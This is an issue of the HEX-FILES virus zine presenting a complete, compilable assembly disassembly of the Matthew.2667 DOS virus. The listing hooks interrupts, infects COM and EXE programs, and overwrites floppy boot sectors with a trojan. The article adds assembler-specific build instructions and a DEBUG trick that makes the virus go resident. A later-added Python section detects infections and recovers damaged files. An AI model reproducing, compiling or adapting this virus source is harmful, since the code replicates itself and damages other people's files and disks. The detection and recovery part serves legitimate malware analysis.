Hexfiles Issue 4 File 003
HEX-FILES No. 4 File 003
════════════════════════════════════════════════════════════════════════════
Matthew.2667
disassembly
by YeZ
yez@rocketmail.com
Name : Matthew.2667
Origin : Saint Louis University, Baguio City, Philippines
Author : Raymond M. Ordona
This virus is similar to its big brother Matthew.3044 (see HEX-FILES
No. 2). They hook the same set of interrupts (INT 08, 13, 21) and
they both infect files the same way -- prepended in COM programs and
appended in EXE programs.

In my opinion everything is the same except for the message, of
course. But even the message is similar though :). The real
difference between the two is that Matthew.2667 traps Fn 0Ah/INT 21h.
If the user types "R.M.O.Ordona IICS-SLU" at the DOS prompt, it
displays on your screen a quotation from Matthew chapter 6 verses 25
to 26, preaching you not to worry about your life, just do what you
want to do. If you want to create a doomsday device to blow the world
well don't worry do it, don't worry about your life. No, I'm just
kidding. hehehehehe. Kidding aside, the message is as follows:

    Therefore I tell you, do not worry about your life,
    what you will eat or drink; or about your body,
    what you will wear. Is not life more important than
    food, and the body more important than clothes?
    Look at the birds of the air; they do not sow or
    reap or store away in barns, and yet your heavenly
    Father feeds them. Are you not much more valuable
    than they?

        Matthew 6:25 (Agnes) May 92' IICS-SLU B.C.

The last line of this message states that the quotation starts at
Matthew 6:25. I don't know anything about "(Agnes)". "May 92'" is
probably the date the virus was written. "IICS-SLU B.C.", as
documented in HEX-FILES No. 3, refers to the Institute of Information
and Computing Sciences-Saint Louis University Baguio City. IICS is
now known as College of Information and Computing Sciences.

The boot sector trojan of this variant would make your diskette
unreadable on some computers depending on the installed BIOS.

Well so far this is the only difference between the two. Of course,
this is aside from their obvious difference, their virus length,
which is 2667 bytes for this variant.

If on running the virus you thought it does not work, you are right
and you are also wrong. It is likely that it would not load in memory
when you execute it. The culprit is the method it uses to determine
prior memory residency. It expects 0000:01BC (the first byte of the
INT 6Fh vector, TsrMark in the listing) to contain a byte value of
00 hex if it has not yet gone resident. Unfortunately, 0000:01BC
is likely to contain a value other than 00 hex. This is the reason
why this variant is not as widely distributed as the 3044 variant.

If the virus does not seem to work, check whether 0000:01BC has a
non-zero hex value. If it contains 01 hex, the virus is resident and
there is something that prevents the virus from infecting files. To
check, try this:

Load DEBUG.EXE and enter "d 0:1bc 1bc" (without the quotes) on the
debug prompt. If the value returned is not 00 hex, enter "e 0:1bc 0"
(without the quotes). Exit debug by typing "q" (again, without the
quotes). You have to press the enter key after typing each debug
command for it to execute. You could now execute the virus and it
would work as intended.

What would happen if you change the content of 0000:01BC? I don't
know. So far, nothing happens out of the ordinary. But if you're
scared out of your wits, you could always reboot after playing
around with the virus.

When playing with a virus, always remember that you are handling a
program that is capable of replicating and, at times, creating havoc.
So be careful when toying around with these programs.

Have fun.

── MATT2667.ASM STARTS HERE ─────────────────────────────────────────
;
; WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING
;
;            VIRUS DROPS TROJAN IN BOOT SECTOR
;
; WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING*WARNING
;
; HEX-FILES No 4
;
; Virus Name: Matthew.2667
; Author    : Raymond M. Ordona
; Origin    : Saint Louis University
;             Baguio City, Philippines
;
; Program listing created by YeZ <yez@rocketmail.com>
;
; COMPILING INSTRUCTION
;
;   This virus was originally compiled in MASM 5.0.
;   This could only be compiled without correction
;   in MASM 5.0.
;
;   You would have to code a NOP nine lines after
;   "InfectSystem:" if you want to use TASM 2.01
;   to get an exact copy of the virus. Then
;   compile in TASM without options/switches.
;
;   To use A86 4.02, you would need to code the
;   "CS:" segment override. All memory operands
;   following the assume directives which specify
;   DS as nothing should be coded with CS: segment
;   override. Without these, A86 assumes the
;   segment as DS, which would be erroneous in
;   some instances. Using A86 would certainly
;   create a new variant.
;
; Greetz: Well here it is enjoy!!!...                              |YeZ|
;
;
ExeHeaderStruc struc
ExeSig dw ?
ExeImgLng dw ?
ExeSecLng dw ?
ExeRelocItm dw ?
ExeHeadLng dw ?
ExeMinAlloc dw ?
ExeMaxAlloc dw ?
ExeSsGap dw ?
ExeSpLng dw ?
ExeWrdChk dw ?
ExeIpEntry dw ?
ExeCsGap dw ?
Exe1stReloc dw ?
ExeOvlNum dw ?
ExeHeaderStruc ends
YeZ_DisAsm segment 'code'
assume cs:YeZ_DisAsm,ds:nothing
Ivt08 equ 8*4
Ivt13 equ 13h*4
Ivt6E equ 6eh*4
TsrMark equ 6fh*4
M2667 equ offset First_Generation - offset Matthew_2667
rxz equ 2667
org 100h
Matthew_2667:
jmp First_Generation
db 13,13,32,32,32,32 ; erases entry point jmp on TYPE
StartMat2667Msg db 10,13,10,13
MatthewMsg label byte
db 'Therefore I tell you, do not worry about your life,',13,10
db 'what you will eat or drink; or about your body,' ,13,10
db 'what you will wear. Is not life more important than',13,10
db 'food, and the body more important than clothes?' ,13,10
db 'Look at the birds of the air; they do not sow or' ,13,10
db 'reap or store away in barns, and yet your heavenly' ,13,10
db 'Father feeds them. Are you not much more valuable' ,13,10
db 'than they?' ,13,10,13,10
db 4 dup (' ')
db "Matthew 6:25 (Agnes) May 92' IICS-SLU B.C."
MatthewMsgLen equ $-MatthewMsg
db 10,13,'$'
db 13,32,13,10,0,1ah ; this ends the message when TYPE is used
; to view an infected COM program
VirChkS1 dw 92a1h ;//--
VirChkS2 dw 505h ;\\-- infection markers
VirusSize dw M2667 ; virus length
SecExe dw ?
LgtExe dw ?
CSExe dw ?
IPExe dw ?
SSExe dw ?
SPExe dw ?
ChkSumExe dw ?
ECSCount db ?
Psp dw ?
dw ? ;hhhhmmmm....????
FileType db ?
db 1 ;hhhaaahhh????
Int21 dd ?
Int08 dd ?
Int24 dd ?
Int13 dd ?
Entry1:
jmp EntryVir
ExeHostEntry dd ?
HostName db 50h dup (?)
db '$' ;hhhheeeehhhhh????
HostHandle dw ?
HostAttr dw ?
HostSize dw ?
RAMBlk dw ?
HostDate dw ?
HostTime dw ?
HostSizeLo dw ?
HostSizeHi dw ?
EnvFile dd ?
DosVer db ?
EnvSeg dw ?
Int8Proc: ; Int 8 handler
pushf ; does nothing other than set TSR ID
call [Int08]
push es
push ax
xor ax,ax
mov es,ax
mov byte ptr es:[TsrMark],1 ;set tsr self-recognition
pop ax
pop es
iret
RetSsSpInt24: ;Int 24 handler
xor ax,ax ; ain't it similar to Possessed????
mov es,ax
mov ss,word ptr es:[Ivt6E]
mov sp,word ptr es:[Ivt6E][2]
pop ax
pop es
pop bp
stc
ret
GetSsSpOnInt21Call: ;Calls original Int 21 handler
push bp ; another of Possessed's heritage :)
push es
push ax
xor ax,ax
mov es,ax
mov word ptr es:[Ivt6E],ss
mov word ptr es:[Ivt6E][2],sp
pop ax
pop es
pushf
call [Int21]
pop bp
ret
GetHostName: ;Copy host name
push ds
push cs
pop ds
mov di,offset HostName
mov ax,ds
pop ds
mov es,ax
mov si,dx
mov cx,80
cld
rep movsb
ret
GotoBegPtrHost: ; moves pointer to begin of file
xor cx,cx
mov dx,cx
mov ax,4200h
call GetSsSpOnInt21Call
ret
BogusBootBlk: ;Entry point of our Trojan Boot block
jmp BogusBootBegin
db 1ah
; This holds the encrypted copy of the message you would see
; at the start of the virus. EncMatthewMsg and BootMess are displayed
; by the trojan if diskette is used to boot your computer.
EncMatthewMsg db MatthewMsgLen dup (?)
BootMess db 13,10,13,10,'System Disk Needed...',10,10,13,'$'
BootMessLen equ $-BootMess
DisplayBogusMsg:
mov ah,0eh ;Display our message...
mov bx,16h
mov cx,1
int 10h
ret
DecryptBogusDat:
mov al,byte ptr [si] ; get a character of the message
cmp al,'$'+'9' ; is it '$'
je DoneDecrypt ; then we're through with the message
sub al,'9' ; else, decrypt it...
call DisplayBogusMsg ; ...and show it.
inc si ; get next character
jmp DecryptBogusDat
DoneDecrypt:
ret
CallGetDelta:
jmp GetDelta
BogusBootBegin: ;Set SS and SP on boot
xor ax,ax
mov ss,ax
mov sp,7c00h
call CallGetDelta
GetDelta: ;Get our Data offset
pop di
mov ax,(offset GetDelta - offset EncMatthewMsg)
sub di,ax
push cs
pop ds
RepeatShow:
mov si,di
call DecryptBogusDat
xor ax,ax ; pause till next key press....
int 16h ; ...that is user insert system disk
int 19h ; reboot!
jmp RepeatShow ; <--- author only too careful :)
db 55h,0aah ; bootable disk sig
DecryptMatthew625: ; Makes clean copy of message on
push cs ; new infection
pop ds
mov cx,MatthewMsgLen
mov di,offset Matthew_2667 + 13
mov si,offset EncMatthewMsg
cld
DecryMatthew625Loop:
mov ax,ds
mov es,ax
mov al,[si]
sub al,'9'
mov es:[di],al
inc di
inc si
loop DecryMatthew625Loop
ret
;
; Is R.M.O. Ordona the author or is it dedicated to him/her????
; Still remember Prof. Hermilito Go of MSU? :)
;
; Anybody from Baguio City, esp. SLU, who could shed light on this????
;
RMO_Ordona db 'R.M.O.Ordona IICS-SLU'
RMO_OrdonaLen equ $-RMO_Ordona
DecryptRmoOrdona: ; decrypts RMO_Ordona when it TSR
push ds
push cs
pop ds
mov si,offset RMO_Ordona
mov cx,RMO_OrdonaLen
DecryptOrdonaLoop:
sub byte ptr [si],'$'
inc si
loop DecryptOrdonaLoop
pop ds
ret
EncryptRmoOrdona: ; encrypts RMO_Ordona on file infect
push ds
push cs
pop ds
mov si,offset RMO_Ordona
mov cx,RMO_OrdonaLen
EncryptOrdonaLoop:
add byte ptr [si],'$'
inc si
loop EncryptOrdonaLoop
pop ds
ret
COMInfectHost: ; write virus to COM program
push ds
call EncryptRmoOrdona
pop ds
mov dx,offset Matthew_2667
mov cx,[VirusSize]
mov ah,40h
mov bx,[HostHandle]
call GetSsSpOnInt21Call
push ds
call DecryptRmoOrdona
pop ds
ret
GetDiskSize: ; get disks free space
mov ah,36h
mov dl,0
call GetSsSpOnInt21Call
cmp ax,0ffffh
jne ConvertSize2Bytes
BytesNotSuffice:
stc
ret
ConvertSize2Bytes: ; is free space less than virus length?
xor dx,dx
mul bx
mul cx
or dx,dx
jnz MoreBytes
cmp ax,[VirusSize]
jb BytesNotSuffice
MoreBytes:
ret
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
InfectHostRoutine: ; copy exec program name
call GetHostName ; and hook int 24
push cs
pop ds
mov ax,3524h
call GetSsSpOnInt21Call
mov word ptr [Int24][2],es
mov word ptr [Int24],bx
mov ax,2524h
mov dx,offset RetSsSpInt24
call GetSsSpOnInt21Call
jmp Cont1IHR
assume cs:YeZ_DisAsm,ds:nothing
RetInt24: ; restores int 24
mov ax,2524h
mov dx,word ptr [Int24]
mov ds,word ptr [Int24][2]
call GetSsSpOnInt21Call
ret
Cont1IHR: ;Prepare the host for infection...
call GetDiskSize
jc RetInt24
mov dx,offset HostName
mov ax,4300h ; save file attribute
call GetSsSpOnInt21Call
jc RetInt24
mov [HostAttr],cx
mov ax,4301h
mov cx,20h ; clear hid-sys-r/o attributes
call GetSsSpOnInt21Call
jc RetInt24
mov ax,3d02h ; open file read/write
call GetSsSpOnInt21Call
jc RetInt24
mov [HostHandle],ax ; save file handle
mov bx,ax
mov ax,5700h ; save file time/date stamp
call GetSsSpOnInt21Call
mov [HostDate],dx
mov [HostTime],cx
mov bx,0fffeh ; allocate maximum free memory
mov ah,48h
call GetSsSpOnInt21Call
jnc GetAllocRamBlk
mov ah,48h
call GetSsSpOnInt21Call
jc RetInt24
GetAllocRamBlk:
mov [RAMBlk],ax ; Save allocated memory segment
xor cx,cx
mov dx,cx
mov bx,[HostHandle]
mov ax,4202h ; get file length
call GetSsSpOnInt21Call
jc OnError1
mov [HostSize],ax ; save low word of file length
call GotoBegPtrHost ; move pointer to begin of file
jc OnError1
mov cx,[HostSize] ; read entire COM file or all/portion
xor dx,dx ; of EXE program from start.
mov ds,[RAMBlk]
mov ah,3fh
call GetSsSpOnInt21Call
OnError1:
jc RetHostAll
xor si,si
mov byte ptr [FileType],1 ; initialize file type flag as COM
cmp word ptr [si].ExeSig,'ZM' ; Is it an Exe
je ExeHost
mov ax,[VirChkS1] ; ----------------- infection check
cmp [si+(offset VirChkS1 - offset Matthew_2667)],ax
je OnError2 ; exit already infected
mov ax,[VirChkS2] ;------------------ infection check
cmp [si+(offset VirChkS2 - offset Matthew_2667)],ax
je OnError2 ; exit already infected
call GotoBegPtrHost ; move pointer to begin of file
jmp ChkCOMSize
OnError2:
jmp RetHostAll
ChkCOMSize:
mov ax,[HostSize]
add ax,[VirusSize]
cmp ax,0fde6h ; COM too big?
jnb OnError2
push cs
pop ds
call COMInfectHost ; write virus to start of file
mov bx,[HostHandle]
mov cx,[HostSize]
mov ds,[RAMBlk]
not word ptr ds:[0] ; encrypt first two bytes
xor dx,dx
mov ah,40h ; write host program after virus
call GetSsSpOnInt21Call
jmp RetHostAll ; done infect! clean up!!!!
ExeHost:
jmp ExeWriteVir
RetHostAll:
mov es,[RAMBlk] ; release allocated memory
mov ah,49h
call GetSsSpOnInt21Call
mov bx,[HostHandle] ; restore file time/date stamp
mov dx,[HostDate]
mov cx,[HostTime]
mov ax,5701h
call GetSsSpOnInt21Call
mov ah,3eh ; close file
call GetSsSpOnInt21Call
push cs
pop ds
mov dx,offset HostName
mov cx,[HostAttr]
mov ax,4301h ; restore file attribute
call GetSsSpOnInt21Call
ret
OnError3:
jmp RetHostAll
ExeWriteVir: ;This is the Exe infection routine
mov byte ptr [FileType],0
mov ds,[RAMBlk]
xor si,si ;All this 277x are checks for
cmp word ptr [si].ExeWrdChk,2770h ;Presence of infection in EXE
je OnError3
cmp word ptr [si].ExeWrdChk,2771h
je OnError3
cmp word ptr [si].ExeWrdChk,2772h
je OnError3
cmp word ptr [si].ExeWrdChk,2773h
je OnError3
cmp word ptr [si].ExeWrdChk,2774h
je OnError3
cmp word ptr [si].ExeWrdChk,2775h
je OnError3
cmp word ptr [si].ExeWrdChk,2776h
je OnError3
cmp word ptr [si].ExeWrdChk,2777h
je OnError3
cmp word ptr [si].ExeWrdChk,2778h
je OnError3
cmp word ptr [si].ExeWrdChk,2779h
je OnError3
push [si].ExeWrdChk ; get EXE checksum value
pop word ptr [ChkSumExe] ; and save
mov word ptr [si].ExeWrdChk,2770h ; set infect marker
mov ax,[si].ExeSsGap ; get SS displacement
add ax,10h ; adjust for PSP
mov [SSExe],ax ; and save
mov ax,[si].ExeSpLng ; get SP
mov [SPExe],ax ; and save
mov ax,[si].ExeIpEntry ; get IP
mov [IPExe],ax ; and save
mov ax,[si].ExeCsGap ; get CS displacement
add ax,10h ; adjust for PSP
mov [CSExe],ax ; and save
push word ptr [si].ExeSecLng ; get page blocks count
pop word ptr [SecExe] ; and save
push word ptr [si].ExeImgLng ; get bytes on last block
pop word ptr [LgtExe] ; and save
xor ax,ax
mov al,[ECSCount] ;this value is not modified by
add ax,2770h ;virus. might be set on first gen
mov [si].ExeWrdChk,ax ; set infection marker
mov ax,[si].ExeSecLng
cmp word ptr [si].ExeImgLng,0 ; get length of EXE
je NotDecAX
dec ax
NotDecAX:
mov bx,200h
mul bx
add ax,[si].ExeImgLng
adc dx,0 ; align orig EXE length to paragraph
add ax,0fh
adc dx,0
and ax,0fff0h
mov [HostSizeLo],ax
mov [HostSizeHi],dx
add ax,[VirusSize]
adc dx,0
jc OnError4
div bx
or dx,dx
jz NotIncAX
inc ax
NotIncAX:
mov [si].ExeSecLng,ax ; set new block count
mov [si].ExeImgLng,dx ; set bytes on last block
mov ax,[HostSizeLo]
mov dx,[HostSizeHi]
mov bx,16
div bx
sub ax,[si].ExeHeadLng
sub ax,16
mov [si].ExeCsGap,ax ; set virus CS displacement
mov word ptr [si].ExeIpEntry,offset Matthew_2667 ; set virus IP
mov [si].ExeSsGap,ax ; set virus SS displacement
mov word ptr [si].ExeSpLng,offset First_Generation+100h ; set virus SP
mov bx,[HostHandle]
call GotoBegPtrHost ; move pointer to beginning of file
mov cx,28
xor dx,dx
mov ah,40h ; write virus EXE header
call GetSsSpOnInt21Call
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
push cs
pop ds
mov dx,[HostSizeLo]
mov cx,[HostSizeHi]
mov ax,4200h ; move pointer to aligned end of file
call GetSsSpOnInt21Call
call COMInfectHost ; write virus code at end of file
OnError4:
jmp RetHostAll
ChkIfOurKeybIn: ; Checks if user has entered the magic phrase.
push es
push cs
pop es
mov di,offset RMO_Ordona
add dx,2
mov si,dx
mov cx,RMO_OrdonaLen
cld
repe cmpsb
jne NotOurKeybIn
mov si,dx
push ds
push cs
pop ds
mov dx,offset StartMat2667Msg ; Preach the user not to
mov ah,9 ; worry about LIFE!!!
int 21h
pop ds
dec si
mov byte ptr [si],0
mov word ptr [si][1],0a0dh
mov byte ptr [si][21],0
NotOurKeybIn:
pop es
ret
assume cs:YeZ_DisAsm,ds:nothing
BufKeybIn:
call [Int21]
pushf
push ds
push dx
call ChkIfOurKeybIn
pop dx
pop ds
popf
iret
Int21Proc: ; Int 21h handler
pushf
cmp ax,4b00h ;ExeCUTE PROGRAM shall we say?
jne NotExec
jmp InfectHost
NotExec:
cmp ah,0ah ;Or DOS buffered in key?
jne JmpRealInt21
jmp BufKeybIn
InfectHost: ;Yes Yes infect the file!!!!
push ds
push es
push si
push di
push ax
push bx
push cx
push dx
call InfectHostRoutine
pop dx
pop cx
pop bx
pop ax
pop di
pop si
pop es
pop ds
JmpRealInt21:
popf
jmp [Int21] ; return to int 21h chain
DiskPayload:
push ax
push bx
push cx
push dx
push es
push cs
pop es
mov bx,offset BogusBootBlk ; write boot sector trojan
mov ax,301h
mov cx,1
mov dh,0
pushf
call [Int13]
pop es
pop dx
pop cx
pop bx
pop ax
ret
Int13Proc: ; int 13h handler
pushf
cmp ah,0 ;Reset disk?
jne JmpRealInt13
test dl,80h ;Hard drive?
jne JmpRealInt13
cmp dl,2 ; >Drive B:?
je JmpRealInt13
call DiskPayload ;Drop our Boot trojan in DRIVE A: or B:
JmpRealInt13:
popf
jmp [Int13]
assume cs:YeZ_DisAsm,ds:YeZ_DisAsm
GetInt21: ; save int 21h
mov ax,3521h
int 21h
mov word ptr [Int21][2],es
mov word ptr [Int21],bx
ret
SetInt21: ; hook int 21h
mov ax,2521h
push cs
pop ds
mov dx,offset Int21Proc
int 21h
ret
GetInt8: ; save int 08
mov ax,3508h
int 21h
mov word ptr [Int08][2],es
mov word ptr [Int08],bx
ret
SetInt8: ; hook int 08
xor ax,ax
mov es,ax
mov word ptr es:[Ivt08][2],cs
mov ax,offset Int8Proc
mov word ptr es:[Ivt08],ax
ret
assume cs:YeZ_DisAsm,ds:nothing
GetInt13: ; save int 13
push es
mov ax,3513h
int 21h
mov word ptr [Int13][2],es
mov word ptr [Int13],bx
pop es
ret
SetInt13: ; hook int 13
push es
xor ax,ax
mov es,ax
mov word ptr es:[Ivt13][2],cs
mov ax,offset Int13Proc
mov word ptr es:[Ivt13],ax
pop es
ret
ReleaseAllocatedMemory: ; release allocated memory
mov ax,cs
mov es,ax
mov ds,ax
mov ah,49h
call GetSsSpOnInt21Call
ret
GetEnvironmentSegment: ; get environment segment
mov es,es:[2ch]
xor di,di
cld
mov al,0
EndOfFileSpec: ; get host file name in environment
cmp al,es:[di]
je GotEndOfFileSpec
mov cx,0ffffh
repne scasb
jmp EndOfFileSpec
GotEndOfFileSpec:
add di,3
mov word ptr [EnvFile][2],di
mov word ptr [EnvFile],es
ret
EntryVir: ;----------------- Enter the VIRUS the initial virus entry point :)
mov [Psp],es
call GetEnvironmentSegment
mov es,[Psp]
push es
xor ax,ax
mov es,ax ; checks 0:1bch if
cmp byte ptr es:[TsrMark],0 ; already TSR?
pop es
jne RamInfected
jmp InfectSystem
RamInfected:
jmp Ret2Host
Dyna2:
mov ax,es
cli
mov ss,ax
sub sp,10h
sti
mov ds,word ptr [ExeHostEntry][2]
mov si,word ptr [ExeHostEntry]
mov di,offset Dyna1
mov cx,(offset First_Generation - Offset Dyna1)
cld
rep movsb
mov ds,ax
call GetInt13 ; save and hook int 08, 13 and 21
call SetInt13
call GetInt21
call SetInt21
call GetInt8
call SetInt8
call DecryptMatthew625 ; make clean copy of message
call DecryptRmoOrdona ; decrypt "RMO Ordona"
call ReleaseAllocatedMemory ; release memory
push cs
pop es
push cs
pop ds
mov ax,word ptr es:[2ch] ; get environment segment
mov [EnvSeg],ax
mov si,0ah ; set terminate handler
mov di,offset First_Generation
mov cx,6
cld
rep movsw
mov bx,offset TerminateHandler
mov es:[0ah],bx
mov es:[0ch],cs
mov dx,offset First_Generation ; set TSR length
mov cx,4
shr dx,cl
add dx,20h
mov ah,31h ; go TSR
call GetSsSpOnInt21Call
TerminateHandler:
push cs
push cs
pop ds
mov es,[Psp]
mov si,offset First_Generation
mov di,0ah ; restore terminate handler
mov cx,6
cld
rep movsw
pop es
mov ax,[Psp]
mov si,offset First_Generation+15 ; create EXEC parameter block
mov [si][4],ax
mov word ptr [si][2],80h
mov [si][8],ax
mov word ptr [si][6],5ch
mov [si][12],ax
mov word ptr [si][10],6ch
mov ax,[EnvSeg]
mov [si],ax
mov ah,30h ; get DOS version
int 21h
mov [DosVer],al
cli
mov [SSExe],ss ; save SS and SP
mov [SPExe],sp
sti
mov ds,word ptr [EnvFile]
mov dx,word ptr [EnvFile][2]
mov ax,4b00h
mov bx,offset First_Generation + 15
cmp byte ptr [DosVer],3
jb UseInt21Exec
call GetSsSpOnInt21Call ; execute host
jmp NoMoreInt21
UseInt21Exec:
int 21h
NoMoreInt21:
cli
mov ss,[SSExe] ; restore SS and SP
mov sp,[SPExe]
sti
mov ah,4dh ; retrieve return code
int 21h
mov ah,4ch ; and terminate
int 21h
ComFileRet: ;Restore COM file host.
mov cx,[HostSize]
add cx,2
mov si,offset First_Generation ; move host code to ES:100
mov di,offset Matthew_2667
shr cx,1
cld
rep movsw
not word ptr es:[Matthew_2667]
mov bx,offset Matthew_2667
jmp bx ; execute COM host
Ret2Host:
cmp byte ptr [FileType],0 ; determine host type. EXE?
je ExeFileRet
mov di,0fde8h
mov cx,(offset Ret2Host - offset ComFileRet)
mov si,offset ComFileRet
cld
rep movsb ;copy host COM restorer to safe place
mov bx,0fde8h
jmp bx ; execute host COM restorer
ExeFileRet: ;Restore Exe Host
mov ax,es
add ax,[SSExe] ; set EXE host SS
mov ss,ax
mov sp,[SPExe] ; set EXE host SP
mov ax,es
add ax,[CSExe] ; set relocator to host entry point
mov word ptr [ExeHostEntry][2],ax
mov ax,[IPExe]
mov word ptr [ExeHostEntry],ax
clc
jmp [ExeHostEntry] ; execute EXE host
InfectSystem:
mov word ptr [ExeHostEntry][2],cs
mov word ptr [ExeHostEntry],offset Dyna1
mov di,offset Matthew_2667
push cs
pop ds
mov si,offset Matthew_2667 ; copy virus code to segment:100h
cld
mov cx,(Dyna1 - Matthew_2667)
;----------------------------------------\\\ fix for TASM 2.01
;----------------------------------------/// insert NOP here
Dyna1:
nop
rep movsb
push es
mov ax,offset Dyna2
push ax
retf
First_Generation:
mov word ptr [Matthew_2667][1],(Entry1-Matthew_2667)-3
mov si,offset MatthewMsg
mov di,offset EncMatthewMsg
mov cx,MatthewMsgLen
mov ah,'9'
cld
MakeEncryptCopy:
lodsb
add al,ah
stosb
loop MakeEncryptCopy
mov si,di
mov cx,BootMessLen
HideBootMess:
lodsb
add al,ah
stosb
loop HideBootMess
call GetInt8
call GetInt13
call GetInt21
jmp SetInts
YeZ db 13,10,7,'Matthew.2667 virus disassembly '
db 'by YeZ <yez@rocketmail.com>'
db 13,10,'for HEX-FILES No. 4',13,10,10,10,'$'
even
SetInts:
call SetInt13
call SetInt21
call SetInt8
push cs
pop es
mov ax,es:[2ch]
push ax
mov es,ax
mov ah,49h
int 21h
pop es
mov ah,49h
int 21h
mov dx,offset YeZ
mov ah,9
int 21h
mov dx,offset MatthewMsg
mov ah,9
int 21h
mov dx,offset First_Generation+200h
mov cl,4
shr dx,cl
mov ax,3100h
int 21h
YeZ_DisAsm ends
end Matthew_2667
── MATT2667.ASM ENDS HERE ───────────────────────────────────────────
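
Added example (not part of the original HEX-FILES article or the disassembly): a Python check for the markers the listing itself tests before infecting (VirChkS1/VirChkS2 in COM files, the ExeWrdChk range in EXE headers), recovery of a COM host by reversing the prepend and the inverted first word, and decoding of the trojan boot sector's message. Offsets are derived from the listing's data layout as assembled; all function names are this example's own, and the sample inputs are constructed and inert.

```python
import struct

# Constants read off the MATT2667.ASM listing on this page.
VIRUS_LEN = 2667                       # "rxz equ 2667" / VirusSize
KEY = ord("9")                         # add/sub key used on the boot message
VIRCHK_S1, VIRCHK_S2 = 0x92A1, 0x0505  # COM infection markers
EXE_MARKS = range(0x2770, 0x277A)      # values tested in the ExeWrdChk field
MESSAGE = (
    "Therefore I tell you, do not worry about your life,\r\n"
    "what you will eat or drink; or about your body,\r\n"
    "what you will wear. Is not life more important than\r\n"
    "food, and the body more important than clothes?\r\n"
    "Look at the birds of the air; they do not sow or\r\n"
    "reap or store away in barns, and yet your heavenly\r\n"
    "Father feeds them. Are you not much more valuable\r\n"
    "than they?\r\n\r\n"
    "    Matthew 6:25 (Agnes) May 92' IICS-SLU B.C."
).encode("ascii")
BOOT_MESS = b"\r\n\r\nSystem Disk Needed...\n\n\r$"
# Layout before VirChkS1: 3-byte jmp, 6 pad bytes, 4 CR/LF bytes, the
# message, 10,13,'$', then the 6-byte TYPE terminator.
S1_OFF = 3 + 6 + 4 + len(MESSAGE) + 3 + 6


def classify(data: bytes) -> str:
    """Report which of the listing's own infection markers a file carries."""
    if data[:2] == b"MZ":
        if len(data) < 0x18:
            return "clean"
        ss, _sp, chk, ip, cs = struct.unpack_from("<5H", data, 0x0E)
        if chk not in EXE_MARKS:
            return "clean"
        # ExeWriteVir also sets IP to 100h and CS equal to SS.
        return "exe-infected" if (ip == 0x100 and cs == ss) else "exe-marker-only"
    if len(data) < S1_OFF + 4:
        return "clean"
    s1, s2 = struct.unpack_from("<HH", data, S1_OFF)
    if s1 == VIRCHK_S1 and s2 == VIRCHK_S2:
        return "com-infected"
    # The virus itself skips a file when either word matches.
    return "com-marker-only" if (s1 == VIRCHK_S1 or s2 == VIRCHK_S2) else "clean"


def recover_com_host(data: bytes) -> bytes:
    """Undo the COM infection: drop the prepended body, re-invert word 0."""
    host = bytearray(data[VIRUS_LEN:])
    if classify(data) != "com-infected" or len(host) < 2:
        raise ValueError("not a recoverable Matthew.2667 COM infection")
    host[0] ^= 0xFF
    host[1] ^= 0xFF
    return bytes(host)


def decode_boot_message(sector: bytes) -> bytes:
    """Decode the text a trojanized boot sector would print (offset 4 on)."""
    out = bytearray()
    for b in sector[4:]:
        if b == ord("$") + KEY:        # encrypted '$' ends the text
            break
        out.append((b - KEY) & 0xFF)
    return bytes(out)


def is_trojan_boot_sector(sector: bytes) -> bool:
    text = decode_boot_message(sector)
    return text.startswith(MESSAGE) and b"System Disk Needed" in text


def constructed_samples():
    """Inert stand-ins built for this example; they contain no virus code."""
    host = b"\xb4\x4c\xcd\x21"                       # 4-byte COM: exit
    body = bytearray(VIRUS_LEN)                      # zero filler, markers only
    struct.pack_into("<HH", body, S1_OFF, VIRCHK_S1, VIRCHK_S2)
    com = bytes(body) + bytes(b ^ 0xFF for b in host[:2]) + host[2:]
    exe = bytearray(0x20)
    exe[:2] = b"MZ"
    struct.pack_into("<5H", exe, 0x0E, 0x0123, 0x0C6B, 0x2770, 0x0100, 0x0123)
    enc = bytes((b + KEY) & 0xFF for b in MESSAGE + BOOT_MESS)
    boot = (b"\x00\x00\x00\x1a" + enc).ljust(512, b"\x00")
    return host, com, bytes(exe), boot


if __name__ == "__main__":
    host, com, exe, boot = constructed_samples()
    print(classify(host), classify(com), classify(exe))
    print(recover_com_host(com) == host, is_trojan_boot_sector(boot))
```

A hit on only one COM word, or on the EXE checksum range without the matching entry-point fields, is reported separately because those values can occur by chance in clean files.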
The following debug script was infected by a third generation of the
virus produced from compiling the program listing (see MATT2667.ASM
above) in MASM 5.0.

This is to remind everybody that this virus overwrites the boot sector
of a diskette in drive A or B with a trojan (message popper). This
would make your diskettes non-bootable. Trojanized diskettes would be
rendered unusable depending on the BIOS installed in your computer.
Have pity on your diskettes! :)
-=<{[* HF4 *]}>=-